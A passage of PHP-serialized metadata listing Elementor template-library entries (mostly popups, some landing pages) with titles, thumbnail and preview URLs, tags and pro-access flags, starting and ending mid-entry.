5\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-5.jpg\";s:12:\"tmpl_created\";i:1653990322;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-services-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:149:\"[\"About\",\"Booking\",\"Consulting\",\"Contact\",\"Doctor\",\"Footer\",\"Form\",\"Header\",\"Landing Pages\",\"Online Service\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:127;a:16:{s:4:\"tmpl\";i:1451;s:2:\"id\";i:23604;s:5:\"title\";s:38:\"Classic | Subscribe | Nail Polish Shop\";s:9:\"thumbnail\";s:96:\"https://library.elementor.com/wp-content/uploads/2022/03/38-Subscribe-Nail-Polish-Shop-Small.jpg\";s:12:\"tmpl_created\";i:1660205114;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/classic-subscribe-nail-polish-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:20:\"[\"Blog\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:128;a:16:{s:4:\"tmpl\";i:1452;s:2:\"id\";i:23047;s:5:\"title\";s:46:\"Fly-In | Contact | Health &#038; Fitness eBook\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/fitness-ebook-small.jpg\";s:12:\"tmpl_created\";i:1660205149;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/fly-in-contact-health-fitness-ebook/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:28:\"[\"Contact\",\"Ebook\",\"Health\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:129;a:16:{s:4:\"tmpl\";i:1199;s:2:\"id\";i:18839;s:5:\"title\";s:27:\"Hello Bar | CTA | eCommerce\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2021/05/350x250.png\";s:12:\"tmpl_created\";i:1621870603;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/hello-bar-cta-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:41:\"[\"Ecommerce\",\"Online Shop\",\"Sale\",\"Shop\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:130;a:16:{s:4:\"tmpl\";i:1247;s:2:\"id\";i:21907;s:5:\"title\";s:50:\"Fly-In | Team Details  | Electronic Music Festival\";s:9:\"thumbnail\";s:104:\"https://library.elementor.com/wp-content/uploads/2022/03/Kit-8-electronic-music-festival-CTA-image-1.jpg\";s:12:\"tmpl_created\";i:1646660881;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:157:\"https://library.elementor.com/popups/fly-in-team-details-popup-electronic-music-festival/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:131;a:16:{s:4:\"tmpl\";i:1253;s:2:\"id\";i:22162;s:5:\"title\";s:46:\"Full Screen | Menu | Electronic Music Festival\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/03/8-music-festival-Team-Details.jpg\";s:12:\"tmpl_created\";i:1647272934;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:154:\"https://library.elementor.com/popups/full-screen-menu-popup-electronic-music-festival/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:132;a:16:{s:4:\"tmpl\";i:1254;s:2:\"id\";i:22172;s:5:\"title\";s:45:\"Classic | Discount | Health &#038; Beauty Spa\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/health-beauty-spa-small.jpg\";s:12:\"tmpl_created\";i:1647273547;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:146:\"https://library.elementor.com/popups/classic-discount-popup-health-beauty-spa/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:36:\"[\"Hair\",\"Health\",\"Sales\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:133;a:16:{s:4:\"tmpl\";i:1255;s:2:\"id\";i:22183;s:5:\"title\";s:44:\"Hello Bar | CTA | Environmental Organization\";s:9:\"thumbnail\";s:104:\"https://library.elementor.com/wp-content/uploads/2022/03/11-Environmental-Organization-Click-Through.jpg\";s:12:\"tmpl_created\";i:1647274384;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:152:\"https://library.elementor.com/popups/hello-bar-cta-popup-environmental-organization/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:134;a:16:{s:4:\"tmpl\";i:1256;s:2:\"id\";i:22195;s:5:\"title\";s:39:\"Classic | Discount | Italian Restaurant\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/restaurant-small.jpg\";s:12:\"tmpl_created\";i:1647329432;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:147:\"https://library.elementor.com/popups/classic-discount-popup-italian-restaurant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:22:\"[\"Restaurant\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:135;a:16:{s:4:\"tmpl\";i:1257;s:2:\"id\";i:22210;s:5:\"title\";s:45:\"Bottom Bar | Discount | Technology Conference\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/tech-conference-small.jpg\";s:12:\"tmpl_created\";i:1647330423;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:153:\"https://library.elementor.com/popups/bottom-bar-discount-popup-technology-conference/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:38:\"[\"Conference\",\"Sales\",\"Save the Date\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:136;a:16:{s:4:\"tmpl\";i:1258;s:2:\"id\";i:22221;s:5:\"title\";s:32:\"Hello Bar | Menu | Tattoo Studio\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/tattoo-studio-small-1.jpg\";s:12:\"tmpl_created\";i:1647330705;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/hello-bar-menu-popup-tattoo-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:17:\"[\"Header\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:137;a:16:{s:4:\"tmpl\";i:1259;s:2:\"id\";i:22231;s:5:\"title\";s:37:\"Full Screen | Booking | Tattoo Studio\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/tattoo-studio-small.jpg\";s:12:\"tmpl_created\";i:1647331823;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/popups/full-screen-booking-popup-tattoo-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:32:\"[\"Booking\",\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:138;a:16:{s:4:\"tmpl\";i:1260;s:2:\"id\";i:22251;s:5:\"title\";s:34:\"Classic | Discount | Dental Clinic\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/dental-clinic-small.jpg\";s:12:\"tmpl_created\";i:1647332171;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/classic-discount-popup-dental-clinic/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:30:\"[\"Health\",\"Marketing\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:139;a:16:{s:4:\"tmpl\";i:1261;s:2:\"id\";i:22261;s:5:\"title\";s:34:\"Slide-In | Contact | Makeup Artist\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/20-Makeup-Artist-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647333946;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/slide-in-contact-popup-makeup-artist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:33:\"[\"Business\",\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:140;a:16:{s:4:\"tmpl\";i:1262;s:2:\"id\";i:22271;s:5:\"title\";s:24:\"Fly-In | CTA | Headphone\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/03/headphones-1-small.jpg\";s:12:\"tmpl_created\";i:1647334784;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/fly-in-cta-popup-headphone/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:41:\"[\"cta\",\"Ecommerce\",\"Marketing\",\"Product\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:141;a:16:{s:4:\"tmpl\";i:1263;s:2:\"id\";i:22277;s:5:\"title\";s:29:\"Classic | CTA | Online Course\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/online-course-2.jpg\";s:12:\"tmpl_created\";i:1647337110;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:137:\"https://library.elementor.com/popups/classic-cta-popup-online-course/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:35:\"[\"Course Online\",\"cta\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:142;a:16:{s:4:\"tmpl\";i:1264;s:2:\"id\";i:22283;s:5:\"title\";s:40:\"Bottom Bar | Contact | Virtual Assistant\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/virtual-assistant-3.jpg\";s:12:\"tmpl_created\";i:1647337517;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:148:\"https://library.elementor.com/popups/bottom-bar-contact-popup-virtual-assistant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:33:\"[\"Business\",\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:143;a:16:{s:4:\"tmpl\";i:1265;s:2:\"id\";i:22289;s:5:\"title\";s:32:\"Fly-In | Contact | Private Tutor\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/private-tutor-4.jpg\";s:12:\"tmpl_created\";i:1647337676;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/fly-in-contact-popup-private-tutor/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:27:\"[\"Contact\",\"Course Online\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:144;a:16:{s:4:\"tmpl\";i:1266;s:2:\"id\";i:22295;s:5:\"title\";s:31:\"Classic |  Login | Login Travel\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/login-travel-6.jpg\";s:12:\"tmpl_created\";i:1647339467;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-login-popup-login-travel/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:9:\"[\"Login\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:145;a:16:{s:4:\"tmpl\";i:1267;s:2:\"id\";i:22301;s:5:\"title\";s:36:\"Full Screen | Login | Login Business\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/login-business-7.jpg\";s:12:\"tmpl_created\";i:1647339782;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:144:\"https://library.elementor.com/popups/full-screen-login-popup-login-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:16:\"[\"Login\",\"SaaS\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:146;a:16:{s:4:\"tmpl\";i:1268;s:2:\"id\";i:22307;s:5:\"title\";s:28:\"Classic | Login | Login Blog\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2022/03/login-blog-8.jpg\";s:12:\"tmpl_created\";i:1647339986;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/popups/classic-login-popup-login-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:16:\"[\"Blog\",\"Login\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:147;a:16:{s:4:\"tmpl\";i:1269;s:2:\"id\";i:22313;s:5:\"title\";s:31:\"Classic | Login | Login Fashion\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/login-fashion-9.jpg\";s:12:\"tmpl_created\";i:1647340204;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/classic-login-popup-login-fashion/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:19:\"[\"Fashion\",\"Login\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:148;a:16:{s:4:\"tmpl\";i:1270;s:2:\"id\";i:22319;s:5:\"title\";s:40:\"Classic |  Login | Login Design Platform\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/03/login-design-platform-10.jpg\";s:12:\"tmpl_created\";i:1647340531;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:147:\"https://library.elementor.com/popups/classic-login-popup-login-design-platform/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:25:\"[\"Design\",\"Login\",\"SaaS\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:149;a:16:{s:4:\"tmpl\";i:1271;s:2:\"id\";i:22325;s:5:\"title\";s:36:\"Fly-In | Contact | Digital Marketing\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/digital-marketing-11.jpg\";s:12:\"tmpl_created\";i:1647340770;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:144:\"https://library.elementor.com/popups/fly-in-contact-popup-digital-marketing/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:51:\"[\"Business\",\"Contact\",\"Digital Agency\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:150;a:16:{s:4:\"tmpl\";i:1272;s:2:\"id\";i:22331;s:5:\"title\";s:36:\"Fly-In | CTA | Dog Cat Food Delivery\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/dog-cat-food-delivery-5.jpg\";s:12:\"tmpl_created\";i:1647341069;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:144:\"https://library.elementor.com/popups/fly-in-cta-popup-dog-cat-food-delivery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:33:\"[\"cta\",\"Delivery Service\",\"Pets\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:151;a:16:{s:4:\"tmpl\";i:1273;s:2:\"id\";i:22337;s:5:\"title\";s:37:\"Full Screen | Contact | Design Studio\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/design-studio-12.jpg\";s:12:\"tmpl_created\";i:1647341370;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/popups/full-screen-contact-popup-design-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:39:\"[\"Business\",\"Contact\",\"Digital Agency\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:152;a:16:{s:4:\"tmpl\";i:1274;s:2:\"id\";i:22343;s:5:\"title\";s:44:\"Classic | Contact | Support Product Platform\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2022/03/support-13.jpg\";s:12:\"tmpl_created\";i:1647341972;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:146:\"https://library.elementor.com/popups/classic-contact-support-product-platform/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:21:\"[\"Contact\",\"Support\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:153;a:16:{s:4:\"tmpl\";i:1275;s:2:\"id\";i:22371;s:5:\"title\";s:38:\"Full Screen | Contact | Small Business\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/small-business-14.jpg\";s:12:\"tmpl_created\";i:1647342508;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/full-screen-contact-small-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:40:\"[\"Business\",\"Contact\",\"Interior Design\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:154;a:16:{s:4:\"tmpl\";i:1276;s:2:\"id\";i:22377;s:5:\"title\";s:31:\"Classic | Contact | Online Shop\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/online-shop-15.jpg\";s:12:\"tmpl_created\";i:1647352786;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/classic-contact-online-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:11:\"[\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:155;a:16:{s:4:\"tmpl\";i:1277;s:2:\"id\";i:22383;s:5:\"title\";s:40:\"Classic | Booking | Children Optometrist\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/children-optometrist-16.jpg\";s:12:\"tmpl_created\";i:1647352963;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/classic-booking-children-optometrist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:53:\"[\"Booking\",\"Business\",\"Contact\",\"Education\",\"Health\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:156;a:16:{s:4:\"tmpl\";i:1278;s:2:\"id\";i:22389;s:5:\"title\";s:28:\"Fly-In | Contact | Open Week\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2022/03/open-week17.jpg\";s:12:\"tmpl_created\";i:1647353281;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/fly-in-contact-open-week/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:34:\"[\"Business\",\"Contact\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:157;a:16:{s:4:\"tmpl\";i:1279;s:2:\"id\";i:22397;s:5:\"title\";s:43:\"Full Screen | CTA | Plant Pots Online Store\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/03/plant-pots-online-store-18.jpg\";s:12:\"tmpl_created\";i:1647353429;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/popups/full-screen-cta-plant-pots-online-store/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:33:\"[\"Ecommerce\",\"Marketing\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:158;a:16:{s:4:\"tmpl\";i:1054;s:2:\"id\";i:15414;s:5:\"title\";s:32:\"Classic | Contact | Dance Studio\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/10/PopUp.jpg\";s:12:\"tmpl_created\";i:1603180596;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-contact-dance-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:16:\"[\"Dance Studio\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:762;s:11:\"trend_index\";i:650;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:159;a:16:{s:4:\"tmpl\";i:1398;s:2:\"id\";i:23687;s:5:\"title\";s:32:\"Pizza Promotion &#8211; Business\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/04/48-Pizza-Promotion.jpg\";s:12:\"tmpl_created\";i:1649670575;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/pizza-promotion-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:92:\"[\"Business\",\"Cooking\",\"Delivery\",\"Discount\",\"Fast Food\",\"Food\",\"Landing 